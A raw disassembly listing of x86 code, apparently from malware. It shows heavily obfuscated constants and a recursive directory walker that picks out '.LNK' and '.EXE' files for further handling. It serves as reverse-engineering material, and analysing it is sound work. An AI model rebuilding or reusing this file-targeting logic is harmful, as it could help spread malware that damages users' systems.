add esi, 0EA58h
mov edx, ds:10013134h
sub edx, 3
imul esi, edx
add edi, esi
cmp edi, [ebp+var_10064]
jnb short loc_41CE60
mov edi, [ebp+var_10050]
and dword ptr ds:1000E130h[edi*4], 0
loc_41CE60: ; CODE XREF: sub_41C9F7+42F�j
; sub_41C9F7+459�j
inc [ebp+var_10050]
loc_41CE66: ; CODE XREF: sub_41C9F7+41C�j
mov eax, ds:10013200h
add eax, 3E3h
cmp [ebp+var_10050], eax
jb short loc_41CE15
movsx eax, word ptr ds:10013264h
movsx edx, word ptr ds:10013180h
add eax, edx
sub eax, 0Dh
mov [ebp+var_10058], eax
jmp short loc_41CEA9
; ---------------------------------------------------------------------------
loc_41CE93: ; CODE XREF: sub_41C9F7+4C2�j
mov edi, [ebp+var_10058]
cmp dword ptr ds:1000E130h[edi*4], 0
jz short loc_41CEBB
inc [ebp+var_10058]
loc_41CEA9: ; CODE XREF: sub_41C9F7+49A�j
mov eax, ds:1001320Ch
add eax, 3E2h
cmp [ebp+var_10058], eax
jb short loc_41CE93
loc_41CEBB: ; CODE XREF: sub_41C9F7+4AA�j
mov edi, [ebp+var_10058]
mov esi, [ebp+var_10060]
mov ds:1000D060h[edi*4], esi
mov eax, edi
mov dl, [ebp+var_10059]
mov ds:1000F200h[eax], dl
movsx eax, word ptr ds:10013100h
sub eax, 3
cmp [ebp+var_10080], eax
jbe loc_41CF90
movsx esi, word ptr ds:100130B0h
add esi, 0FFF8h
mov ds:1000FA50h[edi*2], si
mov eax, ds:10013204h
dec eax
mov [ebp+var_10088], eax
jmp short loc_41CF73
; ---------------------------------------------------------------------------
loc_41CF16: ; CODE XREF: sub_41C9F7+595�j
mov edi, [ebp+var_10088]
mov esi, edi
shl esi, 2
cmp dword ptr ds:1000E130h[esi], 0
jz short loc_41CF6D
movzx edx, word ptr ds:1000FA50h[edi*2]
mov ecx, ds:10013284h
add ecx, 0FFF6h
cmp edx, ecx
jz short loc_41CF6D
mov edx, [ebp+var_10060]
cmp ds:1000D060h[esi], edx
jnz short loc_41CF6D
mov dl, ds:1000F200h[edi]
cmp dl, [ebp+var_10059]
jnz short loc_41CF6D
lea edi, ds:1000FA50h[edi*2]
inc word ptr [edi]
jmp short loc_41CFA7
; ---------------------------------------------------------------------------
loc_41CF6D: ; CODE XREF: sub_41C9F7+532�j
; sub_41C9F7+54A�j ...
inc [ebp+var_10088]
loc_41CF73: ; CODE XREF: sub_41C9F7+51D�j
mov eax, ds:100131F4h
add eax, 3DEh
movsx edx, word ptr ds:10013230h
add eax, edx
cmp [ebp+var_10088], eax
jb short loc_41CF16
jmp short loc_41CFA7
; ---------------------------------------------------------------------------
loc_41CF90: ; CODE XREF: sub_41C9F7+4F6�j
mov edi, [ebp+var_10058]
mov esi, ds:10013284h
sub esi, 8
mov ds:1000FA50h[edi*2], si
loc_41CFA7: ; CODE XREF: sub_41C9F7+574�j
; sub_41C9F7+597�j
call dword ptr ds:10012770h
mov edi, [ebp+var_10058]
mov ds:10011660h[edi*4], eax
lea esi, ds:10013354h
mov ds:1000E130h[edi*4], esi
mov edi, [ebp+var_10058]
lea edi, ds:1000E130h[edi*4]
mov [ebp+var_10084], edi
mov eax, edi
push eax
mov esi, [eax]
call dword ptr [esi+4]
mov [ebp+var_10078], 9
mov edi, [ebp+var_10058]
lea edi, ds:1000E130h[edi*4]
mov [ebp+var_10070], edi
lea esi, [ebp+var_10078]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_1007C]
push edi
mov edi, [edi]
call dword ptr [edi+0A4h]
mov ebx, eax
inc [ebp+var_10058]
lea eax, [ebp+var_10078]
push eax
call dword ptr ds:10012BB0h
mov eax, [ebp+var_1007C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41D040: ; CODE XREF: sub_41C9F7+158�j
; sub_41C9F7+165�j ...
cmp [ebp+var_10048], 0
jz short loc_41D055
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41D055: ; CODE XREF: sub_41C9F7+650�j
cmp [ebp+var_4], 0
jz short loc_41D064
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41D064: ; CODE XREF: sub_41C9F7+11B�j
; sub_41C9F7+662�j
inc [ebp+var_1C]
loc_41D067: ; CODE XREF: sub_41C9F7+CD�j
mov eax, [ebp+var_28]
cmp [ebp+var_1C], eax
jb loc_41CAC9
loc_41D073: ; CODE XREF: sub_41C9F7+B6�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41D07C: ; CODE XREF: sub_41C9F7+8E�j
mov eax, [ebp+var_2C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
loc_41D087: ; CODE XREF: sub_41C9F7+5F�j
; sub_41C9F7+1E6�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C9F7 endp
; ---------------------------------------------------------------------------
dd 4001B8h, 8C280h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D094 proc near ; CODE XREF: sub_421353+346�p
; sub_421353+440�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov edi, ds:100131CCh
sub edi, 6
cmp edx, edi
jnz short loc_41D0B8
mov eax, [ebp+arg_0]
jmp short loc_41D0D2
; ---------------------------------------------------------------------------
loc_41D0B8: ; CODE XREF: sub_41D094+1D�j
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov [ebp+var_8], eax
mov edi, eax
mul esi
mov [ebp+var_C], eax
mov edi, eax
add edi, esi
mov [ebp+var_4], edi
mov eax, edi
loc_41D0D2: ; CODE XREF: sub_41D094+22�j
pop edi
pop esi
leave
retn
sub_41D094 endp
; =============== S U B R O U T I N E =======================================
sub_41D0D6 proc near ; CODE XREF: sub_42091E+259�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov ecx, esi
mov eax, ds:10013154h
movsx edx, word ptr ds:10013098h
add eax, edx
sub eax, 2
cmp ecx, eax
jge short loc_41D12C
mov eax, ds:100130C4h
movsx edx, word ptr ds:100131F0h
add eax, edx
sub eax, 5
imul ecx, eax
mov eax, ds:1001309Ch
sub eax, 4
mov edx, esi
add edx, eax
movsx eax, word ptr ds:1001327Ch
add eax, ds:1001315Ch
sub eax, 9
imul edx, eax
sub ecx, edx
jmp loc_41D269
; ---------------------------------------------------------------------------
loc_41D12C: ; CODE XREF: sub_41D0D6+1A�j
dec ecx
mov eax, ds:1001309Ch
add eax, 0Eh
add eax, ds:100130ACh
cmp ecx, eax
jge short loc_41D16C
movsx eax, word ptr ds:100131E0h
add eax, ds:100130ACh
sub eax, 2
imul ecx, eax
mov eax, ecx
sub eax, esi
mov edx, ds:100131BCh
inc edx
add edx, ds:100131A0h
mov ecx, eax
sub ecx, edx
jmp loc_41D269
; ---------------------------------------------------------------------------
loc_41D16C: ; CODE XREF: sub_41D0D6+67�j
dec ecx
movsx eax, word ptr ds:100130E0h
mov edx, ds:1001314Ch
lea eax, [eax+edx+1Bh]
cmp ecx, eax
jge short loc_41D1A4
movsx eax, word ptr ds:100130A4h
add eax, ds:10013234h
sub eax, 7
imul ecx, eax
mov eax, ds:10013158h
add eax, 39h
sub ecx, eax
jmp loc_41D269
; ---------------------------------------------------------------------------
loc_41D1A4: ; CODE XREF: sub_41D0D6+AA�j
dec ecx
mov eax, ds:10013154h
add eax, 1Dh
cmp ecx, eax
jge short loc_41D1D1
movsx eax, word ptr ds:1001316Ch
inc eax
imul ecx, eax
mov eax, ds:100130C4h
add eax, 39h
add eax, ds:100130D4h
sub ecx, eax
jmp loc_41D269
; ---------------------------------------------------------------------------
loc_41D1D1: ; CODE XREF: sub_41D0D6+D9�j
dec ecx
movsx eax, word ptr ds:100131E0h
mov edx, ds:100130B4h
lea eax, [eax+edx+21h]
cmp ecx, eax
jge short loc_41D20F
movsx eax, word ptr ds:10013264h
add eax, ds:10013114h
sub eax, 0Fh
imul ecx, eax
movsx eax, word ptr ds:10013174h
mov edx, ds:10013138h
lea eax, [eax+edx+4Dh]
sub ecx, eax
jmp short loc_41D269
; ---------------------------------------------------------------------------
loc_41D20F: ; CODE XREF: sub_41D0D6+10F�j
dec ecx
mov eax, ds:100131ECh
add eax, 2Eh
cmp ecx, eax
jge short loc_41D235
mov eax, ds:1001310Ch
sub eax, 4
imul ecx, eax
movsx eax, word ptr ds:100130B0h
add eax, 63h
sub ecx, eax
jmp short loc_41D269
; ---------------------------------------------------------------------------
loc_41D235: ; CODE XREF: sub_41D0D6+144�j
dec ecx
mov eax, ds:10013198h
add eax, 37h
cmp ecx, eax
jge short loc_41D259
mov eax, ds:1001311Ch
sub eax, 3
imul ecx, eax
mov eax, ds:1001317Ch
add eax, 6Bh
sub ecx, eax
jmp short loc_41D269
; ---------------------------------------------------------------------------
loc_41D259: ; CODE XREF: sub_41D0D6+16A�j
mov eax, ds:1001318Ch
add eax, 34h
add eax, ds:10013120h
sub ecx, eax
loc_41D269: ; CODE XREF: sub_41D0D6+51�j
; sub_41D0D6+91�j ...
mov eax, ecx
pop esi
retn
sub_41D0D6 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
movsx eax, word ptr ds:100131C0h
sub eax, 4
cmp ds:1000F608h, eax
jbe short loc_41D28D
push 1000F608h
call dword ptr ds:1000D010h
loc_41D28D: ; CODE XREF: .data:0041D280�j
mov eax, ds:1000F608h
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov esi, [ebp+8]
mov eax, [ebp+18h]
mov [ebp+18h], ax
movsx eax, word ptr ds:1001322Ch
add eax, 3
cmp ds:1000F620h, eax
jnb short loc_41D2C6
mov eax, ds:10013258h
sub eax, 2
mov ds:1000F620h, eax
loc_41D2C6: ; CODE XREF: .data:0041D2B7�j
mov eax, ds:10013280h
mov edi, eax
add edi, ds:10013210h
sub edi, 5
jmp short loc_41D2E4
; ---------------------------------------------------------------------------
loc_41D2D8: ; CODE XREF: .data:0041D2F0�j
lea ebx, ds:1000E130h[edi*4]
cmp esi, ebx
jz short loc_41D2F2
inc edi
loc_41D2E4: ; CODE XREF: .data:0041D2D6�j
mov eax, ds:100130F4h
add eax, 3E1h
cmp edi, eax
jb short loc_41D2D8
loc_41D2F2: ; CODE XREF: .data:0041D2E1�j
mov eax, ds:10013094h
add eax, 3DCh
movsx edx, word ptr ds:10013230h
add eax, edx
cmp edi, eax
jnz short loc_41D310
xor eax, eax
jmp loc_41D45E
; ---------------------------------------------------------------------------
loc_41D310: ; CODE XREF: .data:0041D307�j
movzx esi, word ptr ds:1000FA50h[edi*2]
mov ebx, ds:100130ACh
movsx edx, word ptr ds:1001327Ch
add ebx, edx
sub ebx, 4
cmp esi, ebx
jnz short loc_41D355
movzx eax, byte ptr ds:1000F200h[edi]
push eax
push dword ptr ds:1000D060h[edi*4]
call sub_42284B
add esp, 8
and dword ptr ds:1000E130h[edi*4], 0
xor eax, eax
jmp loc_41D45E
; ---------------------------------------------------------------------------
loc_41D355: ; CODE XREF: .data:0041D32C�j
movzx esi, word ptr ds:1000FA50h[edi*2]
mov ebx, ds:1001315Ch
add ebx, 0FFF6h
cmp esi, ebx
jnz loc_41D43C
mov eax, ds:10013110h
movsx edx, word ptr ds:100130D8h
add eax, edx
sub eax, 7
mov [ebp-4], eax
jmp loc_41D425
; ---------------------------------------------------------------------------
loc_41D38A: ; CODE XREF: .data:0041D432�j
mov esi, [ebp-4]
mov ebx, esi
shl ebx, 2
cmp dword ptr ds:1000E130h[ebx], 0
jz loc_41D422
movzx edx, word ptr ds:1000FA50h[esi*2]
movsx ecx, word ptr ds:100130C0h
add ecx, 0FFFDh
cmp edx, ecx
jz short loc_41D422
mov edx, ds:1000D060h[edi*4]
cmp ds:1000D060h[ebx], edx
jnz short loc_41D422
mov bl, ds:1000F200h[esi]
cmp bl, ds:1000F200h[edi]
jnz short loc_41D422
movzx esi, word ptr ds:1000FA50h[esi*2]
mov ebx, ds:1001309Ch
sub ebx, 4
cmp esi, ebx
jnz short loc_41D413
mov esi, [ebp-4]
movzx ebx, byte ptr ds:1000F200h[esi]
push ebx
push dword ptr ds:1000D060h[esi*4]
call sub_42284B
add esp, 8
and dword ptr ds:1000E130h[edi*4], 0
jmp short loc_41D438
; ---------------------------------------------------------------------------
loc_41D413: ; CODE XREF: .data:0041D3EC�j
mov esi, [ebp-4]
lea esi, ds:1000FA50h[esi*2]
dec word ptr [esi]
jmp short loc_41D438
; ---------------------------------------------------------------------------
loc_41D422: ; CODE XREF: .data:0041D39A�j
; .data:0041D3B7�j ...
inc dword ptr [ebp-4]
loc_41D425: ; CODE XREF: .data:0041D385�j
mov eax, ds:1001328Ch
add eax, 3E2h
cmp [ebp-4], eax
jb loc_41D38A
loc_41D438: ; CODE XREF: .data:0041D411�j
; .data:0041D420�j
xor eax, eax
jmp short loc_41D45E
; ---------------------------------------------------------------------------
loc_41D43C: ; CODE XREF: .data:0041D36B�j
movzx esi, word ptr ds:1000FA50h[edi*2]
mov ebx, ds:10013274h
add ebx, ds:1001318Ch
cmp esi, ebx
jle short loc_41D45C
dec word ptr ds:1000FA50h[edi*2]
loc_41D45C: ; CODE XREF: .data:0041D452�j
xor eax, eax
loc_41D45E: ; CODE XREF: .data:0041D30B�j
; .data:0041D350�j ...
pop edi
pop esi
pop ebx
leave
retn 24h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D465 proc near ; CODE XREF: sub_41B930+B8�p
; sub_41BA2F+1CD�p ...
var_EF38 = dword ptr -0EF38h
var_EF34 = dword ptr -0EF34h
var_EF30 = dword ptr -0EF30h
var_EF2C = byte ptr -0EF2Ch
var_EF2B = byte ptr -0EF2Bh
var_EE2C = dword ptr -0EE2Ch
var_EE24 = byte ptr -0EE24h
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 0EF38h
call sub_423379
push ebx
push esi
push edi
mov edi, ds:10013288h
movsx esi, word ptr ds:10013160h
add edi, esi
imul edi, 3C0h
sub edi, 12C0h
movsx esi, word ptr ds:100131C0h
lea edi, [edi+esi+0EA5Ch]
shl edi, 1
mov [ebp+var_EF38], edi
push edi
call sub_4232FE
add esp, 4
mov [ebp+var_EE2C], eax
movzx eax, [ebp+arg_0]
mov edx, ds:10013200h
add edx, ds:100130A0h
sub edx, 8
cmp eax, edx
jnz short loc_41D4EF
push 10014171h
call sub_41C914
add esp, 4
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10012634h
add esp, 8
jmp loc_41D5FD
; ---------------------------------------------------------------------------
loc_41D4EF: ; CODE XREF: sub_41D465+65�j
call dword ptr ds:10010228h
mov ebx, eax
mov [ebp+var_EF2C], bl
movzx eax, [ebp+arg_0]
mov edx, ds:10013164h
add edx, ds:100130C4h
sub edx, 9
cmp eax, edx
jnz short loc_41D56C
mov eax, ds:100130F0h
add eax, 6
add eax, ds:1001318Ch
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push [ebp+arg_8]
call sub_420EFF
add esp, 0Ch
push 10014141h
call sub_41C914
add esp, 4
movzx edi, [ebp+var_EF2C]
push edi
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10012634h
add esp, 10h
jmp loc_41D5FD
; ---------------------------------------------------------------------------
loc_41D56C: ; CODE XREF: sub_41D465+AD�j
mov eax, ds:10013194h
sub eax, 9
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push dword ptr ds:10013370h
call sub_420EFF
add esp, 0Ch
push 100140DEh
call sub_41C914
add esp, 4
mov edi, [ebp+arg_18]
mov esi, [ebp+arg_8]
mov ebx, edi
add ebx, esi
push ebx
movsx ebx, word ptr ds:100131DCh
movsx edx, word ptr ds:10013170h
add ebx, edx
dec ebx
push ebx
push [ebp+arg_1C]
push edi
push [ebp+arg_14]
movzx edi, [ebp+var_EF2C]
push edi
mov edi, esi
sub edi, [ebp+arg_C]
movsx esi, word ptr ds:10013104h
sub esi, 4
sub edi, esi
push edi
push 10010230h
push [ebp+arg_10]
push [ebp+arg_20]
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10012634h
add esp, 34h
loc_41D5FD: ; CODE XREF: sub_41D465+85�j
; sub_41D465+102�j
push [ebp+var_EF38]
push [ebp+var_EE2C]
movsx eax, word ptr ds:10013130h
movsx edx, word ptr ds:1001316Ch
add eax, edx
sub eax, 3
neg eax
push eax
lea eax, [ebp+var_EE24]
push eax
mov eax, ds:1001321Ch
sub eax, 8
push eax
push 0
call dword ptr ds:10012640h
push 100140C4h
call sub_41FB74
add esp, 4
push eax
call dword ptr ds:1000D044h
mov [ebp+var_EF30], eax
push [ebp+var_EE2C]
call dword ptr ds:1000D044h
mov [ebp+var_EF34], eax
push eax
push [ebp+var_EF30]
mov eax, [ebp+arg_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+104h]
push [ebp+var_EF34]
call dword ptr ds:10012BA0h
push [ebp+var_EF30]
call dword ptr ds:10012BA0h
lea esp, [ebp-0EF44h]
pop edi
pop esi
pop ebx
leave
retn
sub_41D465 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D699 proc near ; CODE XREF: sub_41AFF0+B6�p
; sub_41AFF0+ED�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 2Bh
mov edx, 2FA0BE83h
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
mov ebx, edi
mov [ebp+arg_0], bl
movzx eax, [ebp+arg_0]
mov edx, ds:10013280h
sub edx, 4
cmp eax, edx
jnz short loc_41D6D7
mov eax, 65h
jmp loc_41D760
; ---------------------------------------------------------------------------
loc_41D6D7: ; CODE XREF: sub_41D699+32�j
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:100130CCh
sub edx, 6
cmp eax, edx
jnz short loc_41D6F0
mov eax, 79h
jmp short loc_41D760
; ---------------------------------------------------------------------------
loc_41D6F0: ; CODE XREF: sub_41D699+4E�j
movzx eax, [ebp+arg_0]
mov edx, ds:1001320Ch
add edx, ds:10013120h
sub edx, 9
cmp eax, edx
jnz short loc_41D70E
mov eax, 75h
jmp short loc_41D760
; ---------------------------------------------------------------------------
loc_41D70E: ; CODE XREF: sub_41D699+6C�j
movzx eax, [ebp+arg_0]
mov edx, ds:100131E4h
add edx, ds:10013274h
sub edx, 2
cmp eax, edx
jnz short loc_41D72C
mov eax, 69h
jmp short loc_41D760
; ---------------------------------------------------------------------------
loc_41D72C: ; CODE XREF: sub_41D699+8A�j
movzx eax, [ebp+arg_0]
mov edx, ds:1001328Ch
add edx, ds:1001325Ch
sub edx, 0Ah
cmp eax, edx
jnz short loc_41D74A
mov eax, 6Fh
jmp short loc_41D760
; ---------------------------------------------------------------------------
loc_41D74A: ; CODE XREF: sub_41D699+A8�j
movzx eax, [ebp+arg_0]
mov edx, ds:10013154h
sub edx, 2
cmp eax, edx
jnz short loc_41D760
mov eax, 61h
loc_41D760: ; CODE XREF: sub_41D699+39�j
; sub_41D699+55�j ...
pop edi
pop ebx
leave
retn
sub_41D699 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D764 proc near ; CODE XREF: .data:00419A86�p
; sub_41D764+2D8�p ...
var_252 = byte ptr -252h
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 254h
push ebx
push esi
push edi
mov esi, [ebp+arg_0]
cmp [ebp+arg_8], 0
jz short loc_41D792
mov eax, ds:100131E8h
add eax, ds:100130B8h
sub eax, 4
mov [ebp+var_248], eax
jmp loc_41D822
; ---------------------------------------------------------------------------
loc_41D792: ; CODE XREF: sub_41D764+13�j
mov edx, [ebp+arg_4]
mov ecx, ds:100131C4h
add ecx, ds:100131CCh
sub ecx, 0Bh
cmp ds:1000F630h[edx*4], ecx
jnz short loc_41D7C3
push ebx
call dword ptr ds:1000F60Ch
mov eax, ds:100131B8h
sub eax, 4
push eax
call dword ptr ds:10012664h
loc_41D7C3: ; CODE XREF: sub_41D764+47�j
mov eax, ds:10013154h
add eax, 5Dh
add eax, ds:1001318Ch
mov [ebp+var_248], eax
push 100140B9h
call sub_41C914
push [ebp+arg_4]
push eax
lea edx, [ebp+var_252]
push edx
call dword ptr ds:10012634h
add esp, 10h
lea eax, [ebp+var_252]
push eax
call dword ptr ds:10012668h
cmp eax, 3
jnz short loc_41D822
movsx eax, word ptr ds:1001322Ch
movsx edx, word ptr ds:10013144h
lea eax, [eax+edx+11Fh]
mov [ebp+var_248], eax
loc_41D822: ; CODE XREF: sub_41D764+29�j
; sub_41D764+A1�j
xor edi, edi
inc edi
push 100140B2h
call sub_41C914
push esi
push eax
lea edx, [ebp+var_242]
push edx
call dword ptr ds:10012634h
add esp, 10h
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41D846: ; CODE XREF: sub_41D764+E7�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D846
movsx ecx, word ptr ds:100131DCh
add ecx, 4
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_41D8FC
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D86A: ; CODE XREF: sub_41D764+10B�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D86A
mov ecx, ds:10013128h
sub ecx, 5
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 4Ch
jnz short loc_41D8FC
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D896: ; CODE XREF: sub_41D764+137�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D896
mov edx, eax
mov ecx, ds:10013248h
movsx eax, word ptr ds:100130BCh
add ecx, eax
sub ecx, 6
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 4Eh
jnz short loc_41D8FC
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D8CB: ; CODE XREF: sub_41D764+16C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D8CB
movsx ecx, word ptr ds:10013150h
sub ecx, 6
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 4Bh
jnz short loc_41D8FC
push esi
call sub_41C19D
add esp, 4
loc_41D8FC: ; CODE XREF: sub_41D764+FB�j
; sub_41D764+12B�j ...
mov ecx, esi
or eax, 0FFFFFFFFh
loc_41D901: ; CODE XREF: sub_41D764+1A2�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D901
movsx ecx, word ptr ds:100130BCh
add ecx, ds:100131F4h
sub ecx, 8
mov edx, eax
sub edx, ecx
cmp byte ptr [esi+edx], 2Eh
jnz loc_41D9CF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D92B: ; CODE XREF: sub_41D764+1CC�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D92B
movsx ecx, word ptr ds:100130CCh
add ecx, ds:100131B0h
sub ecx, 0Ah
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 45h
jnz short loc_41D9CF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D95E: ; CODE XREF: sub_41D764+1FF�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D95E
mov ecx, ds:10013278h
add ecx, ds:1001320Ch
sub ecx, 5
mov edx, eax
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 58h
jnz short loc_41D9CF
lea ecx, [esi]
or eax, 0FFFFFFFFh
loc_41D990: ; CODE XREF: sub_41D764+231�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41D990
mov edx, eax
mov ecx, ds:10013134h
movsx eax, word ptr ds:10013250h
add ecx, eax
sub ecx, 7
sub edx, ecx
movsx edx, byte ptr [esi+edx]
push edx
call dword ptr ds:1000D030h
add esp, 4
cmp eax, 45h
jnz short loc_41D9CF
push [ebp+var_248]
push esi
call sub_4206A9
add esp, 8
loc_41D9CF: ; CODE XREF: sub_41D764+1BC�j
; sub_41D764+1F3�j ...
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10010258h
mov ebx, eax
movsx eax, word ptr ds:1001322Ch
movsx edx, word ptr ds:10013104h
add eax, edx
sub eax, 0Eh
neg eax
cmp ebx, eax
jz loc_41DAB9
cmp [ebp+var_112], 2Eh
jz loc_41DAB5
push 100140A9h
call sub_41C914
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call dword ptr ds:10012634h
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_41D764
add esp, 20h
jmp short loc_41DAB5
; ---------------------------------------------------------------------------
loc_41DA46: ; CODE XREF: sub_41D764+353�j
lea eax, [ebp+var_13E]
push eax
push ebx
call dword ptr ds:1000E004h
mov edi, eax
or edi, edi
jnz short loc_41DA77
mov eax, [ebp+var_248]
add eax, ds:10012638h
push eax
call dword ptr ds:10012630h
pop ecx
push ebx
call dword ptr ds:1000F60Ch
jmp short loc_41DAB9
; ---------------------------------------------------------------------------
loc_41DA77: ; CODE XREF: sub_41D764+2F4�j
cmp [ebp+var_112], 2Eh
jz short loc_41DAB5
push 100140A0h
call sub_41C914
lea edx, [ebp+var_112]
push edx
push esi
push eax
lea edx, [ebp+var_242]
push edx
call dword ptr ds:10012634h
push [ebp+arg_8]
push [ebp+arg_4]
lea eax, [ebp+var_242]
push eax
call sub_41D764
add esp, 20h
loc_41DAB5: ; CODE XREF: sub_41D764+2A5�j
; sub_41D764+2E0�j ...
or edi, edi
jnz short loc_41DA46
loc_41DAB9: ; CODE XREF: sub_41D764+298�j
; sub_41D764+311�j
pop edi
pop esi
pop ebx
leave
retn
sub_41D764 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DABE proc near ; CODE XREF: .data:0041F30A�p
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = word ptr -38h
var_30 = dword ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
mov eax, ds:1001323Ch
sub eax, 5
mov [ebp+var_4], eax
jmp short loc_41DAEA
; ---------------------------------------------------------------------------
loc_41DAD4: ; CODE XREF: sub_41DABE+40�j
mov eax, 30h
mul [ebp+var_4]
mov [ebp+var_20], eax
and dword ptr ds:10010370h[eax], 0
inc [ebp+var_4]
loc_41DAEA: ; CODE XREF: sub_41DABE+14�j
movsx eax, word ptr ds:10013264h
mov edx, ds:100130A0h
lea eax, [eax+edx+57h]
cmp [ebp+var_4], eax
jb short loc_41DAD4
push 0
call dword ptr ds:1000F0D0h
push 10013394h
push 10014AB8h
push 7
push 0
push 100149F8h
call dword ptr ds:1000F624h
mov ebx, eax
mov eax, ds:1001311Ch
sub eax, 5
cmp ebx, eax
jnz loc_41DCE6
lea eax, [ebp+var_C]
push eax
mov eax, ds:10013394h
push eax
mov edi, [eax]
call dword ptr [edi+1Ch]
mov ebx, eax
mov eax, ds:10013190h
sub eax, 2
cmp ebx, eax
jnz short loc_41DB66
mov eax, ds:1001310Ch
movsx edx, word ptr ds:10013208h
add eax, edx
sub eax, 0Bh
cmp [ebp+var_C], eax
jnz short loc_41DB6B
loc_41DB66: ; CODE XREF: sub_41DABE+90�j
jmp loc_41DC76
; ---------------------------------------------------------------------------
loc_41DB6B: ; CODE XREF: sub_41DABE+A6�j
mov eax, ds:100131D4h
movsx edx, word ptr ds:10013130h
add eax, edx
sub eax, 5
mov [ebp+var_8], eax
jmp loc_41DC6A
; ---------------------------------------------------------------------------
loc_41DB84: ; CODE XREF: sub_41DABE+1B2�j
mov [ebp+var_38], 3
mov eax, [ebp+var_8]
mov [ebp+var_30], eax
lea eax, [ebp+var_3C]
push eax
lea esi, [ebp+var_38]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, ds:10013394h
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
movsx eax, word ptr ds:10013144h
add eax, ds:100130A0h
sub eax, 0Ah
cmp ebx, eax
jnz loc_41DC67
lea eax, [ebp+var_40]
push eax
push 10014AD8h
mov eax, [ebp+var_3C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
